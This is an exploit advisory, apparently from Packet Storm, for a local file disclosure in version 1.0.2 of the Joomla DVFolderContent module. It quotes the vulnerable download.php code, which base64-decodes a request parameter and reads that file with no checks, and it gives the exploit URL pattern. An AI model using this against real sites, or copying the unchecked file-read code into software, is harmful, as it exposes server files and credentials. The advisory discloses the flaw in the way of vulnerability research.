Joomla DVFolderContent 1.0.2 Local File Disclosure

2016-10-01T00:00:00
ID PACKETSTORM:138935
Type packetstorm
Reporter Mojtaba MobhaM
Modified 2016-10-01T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : Joomla DVFolderContent V1.0.2 Module - Local File Disclosure  
# Exploit Author : Persian Hack Team  
# Vendor Homepage : http://www.dvextensions.de/en/extensions/dvfoldercontent  
# Category [ Webapps ]  
# Tested on [ Win ]  
# Version : V1.0.2  
# Date 2016/10/01  
######################  
  
PoC  
The Vulnerable page is  
/modules/mod_dvfoldercontent/download.php  
  
$file = base64_decode($_GET['f']);  
if (is_file($file)) {  
$fileinfo = pathinfo($file);  
$filename = $fileinfo['basename'];  
$filesize = filesize($file);  
header("Content-Type: application/octet-stream; name=$filename");  
header("Content-Disposition: attachment; filename=$filename");  
header("Content-Length: $filesize");  
header("Pragma: no-cache");  
readfile($file);  
  
Exploit:  
http://server/modules/mod_dvfoldercontent/download.php?f=base64   
  
Video : http://persian-team.ir/showthread.php?tid=165&pid=298  
######################  
# Discovered by : Mojtaba MobhaM   
# B3li3v3 M3 I will n3v3r St0p  
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members  
# Homepage : http://persian-team.ir  
######################  
`